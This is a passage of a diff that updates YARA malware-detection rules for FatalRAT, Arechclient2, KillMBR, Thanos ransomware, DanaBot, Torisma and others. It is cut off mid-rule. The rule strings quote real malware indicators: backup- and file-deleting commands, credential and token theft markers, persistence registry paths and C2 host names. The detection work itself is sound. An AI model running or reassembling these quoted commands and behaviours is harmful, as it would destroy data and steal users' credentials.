"/GetActiveDomains.php" wide - $s5 = "DetectVM" ascii wide - $s6 = "/c {0} > {1}" wide - $s7 = "DRIVEUPLOADCOMPLETED => TOTALFILES={0}, FILESUPLOADED={1}" wide - $s8 = "Program => RunAFile()" wide - $s9 = "DoViaCmd" ascii - $s10 = ".msoftupdates.com:" wide - $f1 = "<RootJob>b__" ascii - $f2 = "<GetFiles>b__" ascii - $f3 = "<UpdateServer>b__" ascii - $f4 = "<EthernetId>b__" ascii - $f5 = "<MatchMacAdd>b__" ascii + $s1 = "ft\\Windows\\CurrentVersion\\Run" wide + $s2 = "DIR%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide + $s3 = "%WINDIR%\\sqhos32.wmf" wide + $s4 = "Accept: */*" fullword ascii + $s5 = "Range: bytes=" fullword ascii + $s6 = "module.exe" fullword ascii + $s7 = { 25 73 25 73 2e 25 73 ?? ?? 22 22 26 6c 79 79 56 00 00 00 00 25 73 25 30 34 64 25 30 32 64 25 30 32 64 00 } condition: - uint16(0)==0x5a4d and (5 of ($s*) or ( all of ($f*) and 1 of ($s*))) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Fatalrat : FILE +rule DITEKSHEN_MALWARE_Win_Arechclient2 : FILE { meta: - description = "Detects FatalRAT" + description = "Detects Arechclient2 RAT" author = "ditekSHen" - id = "f9d0c5dd-ae69-512d-a260-01b9765e10eb" - date = "2024-09-06" - modified = "2024-09-06" + id = "c12858ea-5e06-5303-9df0-0f59ba83b5e5" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6110-L6128" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "fb7f6822aa4ef98e77670d276d06c9a37718bce38d32ce5b53fe67513b107fbe" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4271-L4303" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0d841f4d4664fb09801c51f7b65e897e4e698753ad67fc20e2b81d98c0b3d07d" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $x1 = "XXAcQbcXXfRSScR" fullword ascii - $s1 = "CHROME_NO_DATA" fullword ascii - $s2 = "CHROME_UNKNOW" fullword ascii - $s3 = "-Thread running..." ascii - $s4 = "InetCpl.cpl,ClearMyTracksByProcess" ascii nocase - $s5 = "MSAcpi_ThermalZoneTemperature" ascii nocase - $s6 = "taskkill /f /im rundll32.exe" fullword ascii nocase - $s7 = "del /s /f %appdata%\\Mozilla\\Firefox" ascii nocase - $s8 = "\\\\%s\\C$\\" ascii - $s9 = "fnGetChromeUserInfo" fullword ascii - $s10 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" fullword ascii + $s1 = "\\Google\\Chrome\\User Data\\copiedProf\"" wide + $s2 = "\",\"BotName\":\"" wide + $s3 = "\",\"BotOS\":\"" wide + $s4 = "\",\"URLData\":\"" wide + $s5 = "{\"Type\":\"ConnectionType\",\"ConnectionType\":\"Client\",\"SessionID\":\"" wide + $s6 = "{\"Type\":\"TestURLDump\",\"SessionID\":\"" wide + $s7 = "<ReceiveParticipantList>" ascii + $s8 = "<potocSkr>" ascii + $s9 = "fuck_sd" fullword ascii + $s10 = "HandleBotKiller" fullword ascii + $s11 = "RunBotKiller" fullword ascii + $s12 = "ConnectToServer" fullword ascii + $s13 = "KillBrowsers" fullword ascii + $s14 = "keybd_event" fullword ascii + $s15 = "FuckCodeImg" fullword ascii + $v1_1 = "grabber@" fullword ascii + $v1_2 = "<BrowserProfile>k__" ascii + $v1_3 = "<SystemHardwares>k__" ascii + $v1_4 = "<geoplugin_request>k__" ascii + $v1_5 = "<ScannedWallets>k__" ascii + $v1_6 = "<DicrFiles>k__" ascii + $v1_7 = "<MessageClientFiles>k__" ascii + $v1_8 = /<Scan(Browsers|Wallets|Screen|VPN)>k__BackingField/ fullword ascii + $v1_9 = "displayName[AString-ZaString-z\\d]{2String4}\\.[String\\w-]{String6}\\.[\\wString-]{2String7}Local Extension Settingshost" wide + $v1_10 = "\\sitemanager.xml MB or SELECT * FROM Cookiesconfig" wide condition: - uint16(0)==0x5a4d and ((1 of ($x*) and 3 of ($s*)) or 5 of ($s*)) + uint16(0)==0x5a4d and (6 of ($s*) or 7 of ($v1*) or (6 of ($v1*) and 1 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Wingo : FILE +rule DITEKSHEN_MALWARE_Win_Killmbr : FILE { meta: - description = "Detects malicious Golang executables" + description = "Detects KillMBR" author = "ditekSHen" - id = "bc0c84d6-7ea1-5234-89f6-98337900e044" - date = "2024-09-06" - modified = "2024-09-06" + id = "b109865f-e268-5633-bb8e-f390dd050d99" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6130-L6141" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "423b1631ad625fd46a9d10f0ecdf24931cf62a2c1694da3ebdd38daad0a4f724" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4305-L4316" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1ed9206f90052df7e533be4612afa373e5e69fba8f5b5ae4df1c09a9d98958cf" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $s1 = "Go build ID:" ascii - $s2 = /main\.[a-z]{9}Delete/ fullword ascii - $s3 = /main\.[a-z]{9}Update/ fullword ascii - $s4 = /main\.[a-z]{9}rundll/ fullword ascii + $s1 = "\\\\.\\PhysicalDrive" ascii + $s2 = "/logger.php" ascii + $s3 = "Ooops! Your MBR was been rewritten" ascii + $s4 = "No, this ransomware dont encrypt your files, erases it" ascii condition: - uint16(0)==0x5a4d and ( all of them and #s2>2 and #s3>2 and #s4>2) + uint16(0)==0x5a4d and (2 of them and #s1>10) } import "pe" -rule DITEKSHEN_MALWARE_Win_GENERIC03 : FILE +rule DITEKSHEN_MALWARE_Win_Lcpdot : FILE { meta: - description = "Detects unknown malicious executables" + description = "Detects LCPDot" author = "ditekSHen" - id = "aa0a720d-8215-58d8-b3ce-98d50318cbf9" - date = "2024-09-06" - modified = "2024-09-06" + id = "e4db3784-7fb0-58bd-997e-788f409445cd" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6143-L6154" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9166808a3dab80d9d85b3b976ae658160c8389c7d0e05a46d553b5bb9d41a1cb" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4318-L4337" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b0f77f17976c38a69c2ff0d84002f2db29a4d25873309259519115b5f2b210ff" score = 75 - quality = 50 + quality = 75 tags = "FILE" strings: - $s1 = "lbroscfg.dll" wide - $s2 = "cmd /c ping 127.0.0.1 & del /f /q \"" fullword wide - $s3 = "E:\\Data\\Sysceo\\AD\\" fullword ascii - $s4 = "C++\\Browser_noime\\" ascii + $s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword wide + $s2 = "Cookie: SESSID=%s" fullword ascii + $s3 = "Cookie=Enable" fullword ascii + $s4 = "Cookie=Enable&CookieV=%d&Cookie_Time=32" fullword ascii + $s5 = ".?AVTShellCodeRuner@@" fullword ascii + $s6 = ".?AVTHashEncDecoder@@" fullword ascii + $s7 = ".?AVTWebAddressList@@" fullword ascii + $s8 = "WinMain.dll" fullword ascii + $s9 = "HotPlugin" wide + $o0 = { 4c 89 6c 24 08 4c 89 34 24 44 8d 77 01 44 8d 6f } + $o1 = { 8b f0 e8 58 34 00 00 48 8b f8 48 85 c0 74 0c 48 } + $o2 = { c7 44 24 30 47 49 46 38 c7 44 24 34 39 61 27 00 } condition: - uint16(0)==0x5a4d and 3 of them + uint16(0)==0x5a4d and 6 of ($s*) or ( all of ($o*) and 3 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Pandastealer : FILE +rule DITEKSHEN_MALWARE_Win_Torisma : FILE { meta: - description = "Detects Panda Stealer" + description = "Detects Torisma" author = "ditekSHen" - id = "099f0a03-6dfd-5ae5-baaf-fe2b66de759d" - date = "2024-09-06" - modified = "2024-09-06" + id = "e62a0f1c-4404-5da1-9c43-4cb58e735827" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6156-L6172" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "23a911bfe14defe8f961068d43bb349b66ee73f8b2f281f2bec1c0ecb8f37b25" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4339-L4355" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bd3823f8a91fdfc443e20bcb299a5103b7176a694f0d5328e7986de83f677a31" score = 75 - quality = 50 + quality = 75 tags = "FILE" strings: - $s1 = "\\tokens.txt" fullword ascii - $s2 = "user.config" fullword ascii - $s3 = "Discord\\" ascii - $s4 = "%s\\etilqs_" fullword ascii - $s5 = "buildSettingGrabber" ascii - $s6 = "buildSettingSteam" ascii - $s7 = ".?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@" ascii - $s8 = "UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr" ascii - $s9 = "|| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (" ascii + $s1 = "ACTION=PREVPAGE&CODE=C%s&RES=%d" fullword ascii + $s2 = "ACTION=VIEW&PAGE=%s&CODE=%s&CACHE=%s&REQUEST=%d" fullword ascii + $s3 = "ACTION=NEXTPAGE&CODE=S%s&CACHE=%s&RES=%d" fullword ascii + $s4 = "Your request has been accepted. ClientID: {" ascii + $s5 = "Proxy-Connection: Keep-Alive" fullword wide + $s6 = "Content-Length: %d" fullword wide + $o0 = { f7 f9 8b c2 89 44 24 34 48 63 44 24 34 48 8b 4c } + $o1 = { 48 c7 00 ff ff ff ff 48 8b 84 24 90 } + $o2 = { f3 aa 83 7c 24 30 01 75 34 c7 44 24 20 01 } condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and 4 of ($s*) or ( all of ($o*) and 3 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Gelsemine : FILE +rule DITEKSHEN_MALWARE_Win_Thanos : FILE { meta: - description = "Detects Gelsemine" + description = "Detects Thanos / Prometheus / Spook ransomware" author = "ditekSHen" - id = "f7e9ca53-fc52-5da0-a760-cb09c2544f4f" - date = "2024-09-06" - modified = "2024-09-06" + id = "f523906e-ef5e-57be-82ed-06e75c393f42" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6174-L6194" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8c20efa6f34ee9165fac9f1f2e5eb20830a02016309dfaa5681977e1a8ac6068" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4357-L4389" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8ce7cdfe4bca31e21d6fa31a75c46737a41fae3b5b0fda818e3a4709ceaf9bf5" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = "If any of these steps fails.only pick one of the targets for configuration\"If you want to just get on with it*which also use [ " wide - $s2 = "A make implementation+with core modules (please read NOTES.PER_L)2The per_l Text::Template (please read NOTES.PER_L)" wide - $s3 = "NOTES.VMS (OpenVMS)!NOTES.WIN (any supported Windows)%NOTES.DJGPP (DOS platform with DJGPP)'NOTES.ANDROID (obviously Android [ND" wide - $s4 = "A simple example would be this)which is to be understood as one of these" fullword wide - $s5 = "bala bala bala" fullword wide - $s6 = "echo FOO" fullword wide - $s7 = "?_Tidy@?$basic_string@DU?$char_traits@D@std@@V" ascii - $o1 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c } - $o2 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c } - $o3 = { 8b 76 08 2b f0 a1 34 ff 40 00 03 f0 89 35 38 ff } - $o4 = { 83 c4 34 c3 8b 4e 20 6a 05 e8 73 10 00 00 8b 76 } - $o5 = { 8b 44 24 44 2b d1 03 d0 8b f2 e9 14 ff ff ff 8d } - $o6 = { 68 00 06 00 00 6a 00 e8 d3 ff ff ff a2 48 00 41 } + $f1 = "<WorkerCrypter2>b__" ascii + $f2 = "<Encrypt2>b__" ascii + $f3 = "<Killproc>b__" ascii + $f4 = "<GetIPInfo>b__" ascii + $f5 = "<MacAddress>k__" ascii + $f6 = "<IPAddress>k__" ascii + $f7 = "<Crypt>b__" ascii + $s1 = "Aditional KeyId:" wide + $s2 = "process call create cmd.exe /c \\\\" wide + $s3 = "/c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin" wide + $s4 = "\\HOW_TO_DECYPHER_FILES." wide + $s5 = "Client Unique Identifier Key:" wide + $s6 = "/s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk" fullword wide + $s7 = "NtOpenProcess" fullword wide + $s8 = "Builder_Log" fullword wide + $s9 = "> Nul & fsutil file setZeroData offset=0 length=" wide + $s10 = "3747bdbf-0ef0-42d8-9234-70d68801f407" wide + $s11 = "4b195894-0f06-4fdd-afb4-b17fb9246a59" wide + $s12 = "cec564ff-2433-4771-b918-15f58ef6e26c" wide + $s13 = "56258a19-7489-468b-86ee-e7899203d67c" wide + $s14 = "WalkDirectoryTree" fullword ascii + $s15 = "hashtableLock" fullword ascii + $s16 = "get_ParentFrn" fullword ascii + $m1 = "SW5mb3JtYXRpb24uLi" wide + $m2 = "QWxsIHlvdXIgZmlsZXMgd2VyZSBlbmNyeXB0" wide condition: - uint16(0)==0x5a4d and (6 of ($s*) or ( all of ($o*) and 2 of ($s*))) + uint16(0)==0x5a4d and (5 of ($f*) or 5 of ($s*) or (4 of ($f*) and 2 of ($s*) or ( all of ($m*) and 3 of them )) or 8 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Gelsevirine : FILE +rule DITEKSHEN_MALWARE_Win_Tmanager : FILE { meta: - description = "Detects Gelsevirine" + description = "Detects TManager RAT. Associated with TA428" author = "ditekSHen" - id = "70f0ed08-4e07-5ab3-968e-95059d20a8e9" - date = "2024-09-06" - modified = "2024-09-06" + id = "391b72bd-ddf5-5251-b566-c75c1cc16b74" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6224-L6254" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "60d41d6d789f1cd2a7040d6535f13c69ea58a489035838f047b886e8f1f37f63" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4391-L4410" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cdbcc00ae67c9161f6db89cfa658c8bc8fb7fab3915ac5ae99bdd34c42ee2abb" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $s1 = /64loadpath(xp|sv|7)/ fullword wide - $s2 = "{\"Actions\":[]}" fullword wide - $s3 = "PlatformsChunk" fullword wide - $s4 = "CurrentPluginCategory" fullword wide - $s5 = "CurrentOperationPlatform" fullword wide - $s6 = "PersistencePlugins" fullword wide - $s7 = "memory_library_file" fullword wide - $s8 = "LoadPluginBP" fullword ascii - $s9 = "GetOperationBasicInformation" fullword ascii - $s10 = "commonappdata/Intel/Runtime" wide - $s11 = "cfsst x64" fullword wide - $s12 = "ForkOperation" fullword ascii - $c1 = "domain.dns04.com:8080;domain.dns04.com:443;acro.ns1.name:80;acro.ns1.name:1863;" wide - $c2 = "<base64 content=\"" fullword ascii - $c3 = "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" fullword ascii - $m1 = "6BDA7FEF-232F-4EA6-8FC8-24F58CD7B366" ascii wide - $m2 = "46EBBDC3-EEDC-42D4-BA1D-D454DFCE8E42" ascii wide - $m3 = "135054C6-8036-42C7-A97C-31F37D7728BD" ascii wide - $m4 = "DC7FDDF7-B2F1-4B99-BE6A-AA683FF11CE6" ascii wide - $m5 = "131C8113-E083-4C7F-BEAF-82D73B01F2C5" ascii wide - $m6 = "4CCF506D-2F61-4C3A-B9C6-9FA47D43A3FC" ascii wide - $m7 = "B2DC745A-66AE-4A19-B11C-AD74D46B7EE0" ascii wide - $m8 = "6BDA7FEF-232F-4EA6-8FC8-24F58CD7B366" ascii wide + $s1 = "WSAStartup Error!" fullword wide + $s2 = "KB3112342.LOG" fullword wide + $s3 = "\\cmd.exe -c" fullword wide + $s4 = "sock_hmutex" fullword wide + $s5 = "cmd_hmutex" fullword wide + $s6 = "powershell" fullword wide + $s7 = "%s_%d.bmp" fullword wide + $s8 = "!Error!" fullword wide + $s9 = "[Execute]" fullword ascii + $s10 = "[Snapshot]" fullword ascii + $s11 = "GetLanIP error!" fullword ascii + $s12 = "chcp & exit" fullword ascii condition: - uint16(0)==0x5a4d and (6 of ($s*) or (2 of ($c*) and 4 of ($s*)) or (5 of ($m*) and (1 of ($c*) or 3 of ($s*)))) + uint16(0)==0x5a4d and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Ipsechelper : FILE +rule DITEKSHEN_MALWARE_Win_Sn0Wlogger : FILE { meta: - description = "Detects IPsecHelper backdoor" + description = "Detects Sn0w Logger" author = "ditekSHen" - id = "f848ac2a-95ad-596a-b193-5cfb424e33a2" - date = "2024-09-06" - modified = "2024-09-06" + id = "cdb70164-3f72-553f-a6c5-190f699e0743" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6256-L6279" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "be0ecf8a97d289b15b902420d769925b7b22ab835bd7d10d10b059119f41e540" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4412-L4428" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ea4b2281f906271dc249b5036b22eadfc5add94def4f8e4f8a40c384618465d8" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "rundll32.exe advapi32.dll,ProcessIdleTasks" wide - $s2 = "CommandExecute" fullword ascii - $s3 = "DownloadExecuteUrl" fullword ascii - $s4 = "DownloadExecuteFile" fullword ascii - $s5 = "CmdExecute" fullword ascii - $s6 = "ExecuteProcessWithResult" fullword ascii - $s7 = "IsFirstInstance ==> checked" fullword wide - $s8 = "del \"%PROG%%SERVICENAME%\".*" fullword wide - $s9 = ".CreateConfig" wide - $s10 = ".SelfDelete" wide - $c1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.google.com/ EmbeddedWB 14.52;" wide - $c2 = "boot.php" wide - $c3 = "lastupdate.php" wide - $c4 = "main.php" wide - $c5 = "InternetNeeded" wide - $c6 = "DeviceIdSalt" wide + $s1 = "\\SnowP\\Example\\Secured\\" ascii + $s2 = "{0}{3}Content-Type: {4}{3}Content-Disposition: form-data; name=\"{1}\"{3}{3}{2}{3}" wide + $s3 = "\"encrypted_key\":\"(.*?)\"" fullword wide + $s4 = "<SendToDiscord>d__" ascii + $s5 = "_urlWebhook" ascii + $r1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword wide + $r2 = "^\\w+([-+.']\\w+)*@\\w+([-.]\\w+)*\\.\\w+([-.]\\w+)*$" fullword wide + $r3 = "mfa\\.[\\w-]{84}" fullword wide + $r4 = "(\\w+)=(\\d+)-(\\d+)$" fullword wide condition: - uint16(0)==0x5a4d and (6 of ($s*) or 4 of ($c*) or 8 of them ) + uint16(0)==0x5a4d and (4 of ($s*) or ( all of ($r*) and 2 of ($s*)) or 7 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Apostle : FILE +rule DITEKSHEN_MALWARE_Win_Danabot : FILE { meta: - description = "Detects Apsotle" + description = "Detects DanaBot variants" author = "ditekSHen" - id = "6e6d2ef0-b709-5915-b644-db86d9d3f26a" - date = "2024-09-06" - modified = "2024-09-06" + id = "a49e21b9-d40a-5273-a9a2-322a1ec9bbbc" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6281-L6295" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "aa5a522383cbb7e2fdb90f4c4395c7f92f546aa1dbda8f44090225861f011630" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4430-L4459" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8d037b46d719159dc3e60f0c7143022ce8745cfd753c3754ae80a220a838567d" score = 75 - quality = 75 + quality = 50 tags = "FILE" strings: - $s1 = "bytesToBeEncrypted" fullword ascii - $s2 = "SelfDelete" fullword ascii - $s3 = "ReadMeFileName" ascii - $s4 = "DesktopFileName" ascii - $s5 = "SetWallpaper" fullword ascii - $s6 = "get_EncryptionKey" fullword ascii - $s7 = "disall" fullword ascii + $s1 = "ms ie ftp passwords" fullword wide + $s2 = "CookieEntryEx_" fullword wide + $s3 = "winmgmts:\\\\localhost\\root\\cimv2" fullword wide + $s4 = "S-Password.txt" fullword wide + $s5 = "del_ini://Main|Password|" fullword wide + $s6 = "cmd.exe /c start chrome.exe --no-sandbox" wide + $s7 = "cmd.exe /c start firefox.exe -no-remote" wide + $s8 = "\\rundll32.exe shell32.dll,#" wide + $s9 = "S_Error:TORConnect" wide + $s10 = "InjectionProcess" fullword ascii + $s11 = "proxylogin" fullword wide + $s12 = "\\FS_Morff\\FS_Temp\\" wide + $ds1 = "C:\\Windows\\System32\\rundll32.exe" fullword wide + $ds2 = "PExtended4" fullword ascii + $ds3 = "%s-%s" fullword wide + $ds4 = "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9FA0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF0123456789ABCDEF" fullword wide condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and (7 of ($s*) or all of ($ds*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_DEADWOOD : FILE +rule DITEKSHEN_MALWARE_Win_Klackring : FILE { meta: - description = "Detects DEADWOOD" + description = "Detects Klackring variants. Associated with ZINC / Lazarus" author = "ditekSHen" - id = "a75e30d8-75ec-5eaf-94f5-5556a3b947ae" - date = "2024-09-06" - modified = "2024-09-06" + id = "7bd9a68f-d58b-5437-a28b-5a7f1a11038e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6297-L6313" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bf53abc801971b294e0a23bb0162ceb7c56a563a16e73c317f6a890ba545b67d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4461-L4475" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b894e89de720affadd80966d726a44ffce75d71095b0530edb6bfddb76660c54" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "Service Start Work !!!!" fullword ascii - $s2 = "Error GetTokenInformation : " fullword ascii - $s3 = "\\Windows\\System32\\net.exe" fullword wide - $s4 = "App Start Work !!!!" fullword ascii - $s5 = "vmmouse" fullword wide - $s6 = "CDPUserSvc_" wide - $s7 = "WpnUserService_" wide - $s8 = "User is :" wide - $s9 = "\\params" fullword ascii + $s1 = "%s\\%s.dll" fullword wide + $s2 = "cmd.exe /c move /Y %s %s" fullword wide + $s3 = "%s\\win32k.sys" fullword wide + $s4 = "NetSvcInst_Rundll32.dll" fullword ascii + $s5 = "Spectrum.dll" fullword ascii wide + $s6 = "%s\\cmd.exe" fullword wide + $s7 = ".?AVA5Stream@@" fullword ascii condition: uint16(0)==0x5a4d and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Turian : FILE +rule DITEKSHEN_MALWARE_Win_Comebacker : FILE { meta: - description = "Hunt for Turian / Qurian" + description = "Detects ComeBacker variants. Associated with ZINC / Lazarus" author = "ditekSHen" - id = "eafa9442-a01b-5044-bc47-634297a3efcc" - date = "2024-09-06" - modified = "2024-09-06" + id = "d0454d09-4a15-5251-aa7a-cb00604715ca" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6315-L6343" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "87f4263381c5e93fcba0873aa3bb9a1db4b21225141cd7f06be30f5777a47806" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4477-L4492" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0d806fd199f0e8e3576ca837781c2fa06f1a09d75ea16602effb72754d8e4940" score = 75 - quality = 75 + quality = 50 tags = "FILE" - hash1 = "d1218ab9d608ee0212e880204e4d7d75f29f03b77248bca7648d111d67405759" - cnc_domain = "windowsupdate[.]dyndns[.]info" - cnc_ip = "58[.]158[.]177[.]102" strings: - $s1 = "%s a -m5 -hp1qaz@WSX3edc -r %s %s\\*.*" ascii wide - $s2 = "%s a -m5 -hpMyHost-1 -r %s %s\\*.*" ascii wide - $s3 = "%s a -m5 -hp1qaz@WSX3edc -ta%04d%02d%02d000000 -r %s c:" ascii wide - $s4 = "%s a -m5 -hpMyHost-1 -ta%04d%02d%02d000000 -r %s c:" - $s5 = "cmd /c dir /s /O:D %s>>\"%s\"" ascii wide - $s6 = "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v %s /t REG_SZ /d \"%s\" /f" fullword ascii - $s7 = "Not Connect!" fullword ascii - $p1 = "RECYCLER\\S-1-3-33-854245398-2067806209-0000980848-2003\\" ascii wide - $p2 = "%sRECYCLER.{S-1-3-33-854245398-2067806209-0000980848-2003}\\" ascii wide - $p3 = "\\RECYCLER.{S-1-3-33-854245398-2067806209-0000980848-2003}\\" ascii wide - $p4 = "\\RECYCLER.{645ff040-5081-101b-9f08-00aa002f954e}\\" ascii wide - $p5 = "%sRECYCLER.{645ff040-5081-101b-9f08-00aa002f954e}\\" ascii wide - $c1 = "CONNECT %s:%u 